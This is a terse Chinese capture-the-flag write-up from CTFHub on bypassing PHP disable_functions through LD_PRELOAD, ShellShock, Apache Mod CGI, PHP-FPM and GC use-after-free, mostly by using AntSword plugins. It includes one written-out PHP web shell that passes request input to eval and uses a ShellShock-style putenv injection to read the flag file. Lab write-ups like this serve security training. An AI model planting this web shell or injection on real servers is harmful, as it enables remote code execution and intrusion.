ctfhub Bypass disable_function

LD_PRELOAD

url

蚁剑连接

选择插件

点击开始

查看到此文件名编辑连接拼接到url后面重新连接

点击开启终端

在终端执行命令

ls /
/readfile

ShellShock

url

CTFHub 环境实例 | 提示信息

蚁剑连接

写入shell.php

<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

使用插件

终端执行命令得到flag

Apache Mod CGI

查看GetFlag

蚁剑连接

直接使用工具

终端执行命令

PHP-FPM

蚁剑连接

工具连接

拼接地址

在终端执行命令

GC UAF

蚁剑连接

使用工具

在终端执行命令

相关推荐
C4rpeDime2 小时前
自建MD5解密平台-续
android
鲤籽鲲4 小时前
C# Random 随机数 全面解析
android·java·c#
m0_548514778 小时前
2024.12.10——攻防世界Web_php_include
android·前端·php
凤邪摩羯8 小时前
Android-性能优化-03-启动优化-启动耗时
android
凤邪摩羯8 小时前
Android-性能优化-02-内存优化-LeakCanary原理解析
android
喀什酱豆腐8 小时前
Handle
android
m0_7482329210 小时前
Android Https和WebView
android·网络协议·https
m0_7482517210 小时前
Android webview 打开本地H5项目(Cocos游戏以及Unity游戏)
android·游戏·unity
带电的小王10 小时前
VSCode:VSCode安装 -- 最简洁的VSCode安装教程
ide·vscode·编辑器
m0_7482546612 小时前
go官方日志库带色彩格式化
android·开发语言·golang